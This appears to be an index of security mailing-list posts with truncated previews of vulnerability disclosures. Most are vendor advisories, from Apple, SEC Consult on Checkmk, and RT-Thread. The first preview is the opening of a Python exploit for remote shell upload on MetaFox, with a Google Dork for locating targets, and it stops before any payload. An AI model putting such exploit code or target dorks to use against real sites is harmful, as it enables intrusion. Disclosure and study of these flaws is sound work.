Posted by j0ck1ng@tempr.email on Mar 13
#!/usr/bin/env python3
# Exploit Title: MetaFox Remote Shell Upload
# Google Dork: "Social network for niche communities"
# Exploit Author: The Joker
# Vendor Homepage: https://www.phpfox.com
# Version: <= 5.1.8
import json
import requests
import sys
if len(sys.argv) != 4: sys.exit("Usage: %s " % sys.argv[0])
requests.packages.urllib3.disable_warnings()
endpoint = sys.argv[1] + "/api/v1/user/login"
response =…
Posted by SEC Consult Vulnerability Lab, Research via Fulldisclosure on Mar 13
SEC Consult Vulnerability Lab Security Advisory < 20240307-0 >
=======================================================================
title: Local Privilege Escalation via writable files
product: Checkmk Agent
vulnerable version: 2.0.0, 2.1.0, 2.2.0
fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1
CVE number: CVE-2024-0670
impact: high
homepage: https://checkmk.com …
Posted by Marco Ivaldi on Mar 13
Hi,
Please find attached a security advisory that describes multiple
vulnerabilities we discovered in RT-Thread RTOS.
* Title: Multiple vulnerabilities in RT-Thread RTOS
* OS: RT-Thread <= 5.0.2
* Author: Marco Ivaldi <marco.ivaldi () hnsecurity it>
* Date: 2024-03-05
* CVE IDs and advisory URLs:
* CVE-2024-24334 – https://github.com/RT-Thread/rt-thread/issues/8282
* CVE-2024-24335 -…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-12-2024-1 GarageBand 10.4.11
GarageBand 10.4.11 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT214090 .
Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
GarageBand
Available for: macOS Ventura and macOS Sonoma
Impact: Processing a maliciously crafted file may lead to…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-7 visionOS 1.1
visionOS 1.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214087 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: Apple Vision Pro
Impact: An app may be able to spoof system notifications and UI
Description: This…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-6 tvOS 17.4
tvOS 17.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214086 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: A malicious app may be able to observe user data in log…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-5 watchOS 10.4
watchOS 10.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214088 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: Apple Watch Series 4 and later
Impact: A malicious app may be able to observe user data in log…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4
macOS Monterey 12.7.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214083 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Admin Framework
Available for: macOS Monterey
Impact: An app may be able to elevate privileges
Description: A…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5
macOS Ventura 13.6.5 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214085 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Admin Framework
Available for: macOS Ventura
Impact: An app may be able to elevate privileges
Description: A…
Posted by Apple Product Security via Fulldisclosure on Mar 13
APPLE-SA-03-07-2024-2 macOS Sonoma 14.4
macOS Sonoma 14.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214084 .
Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.
Accessibility
Available for: macOS Sonoma
Impact: A malicious app may be able to observe user data in log entries…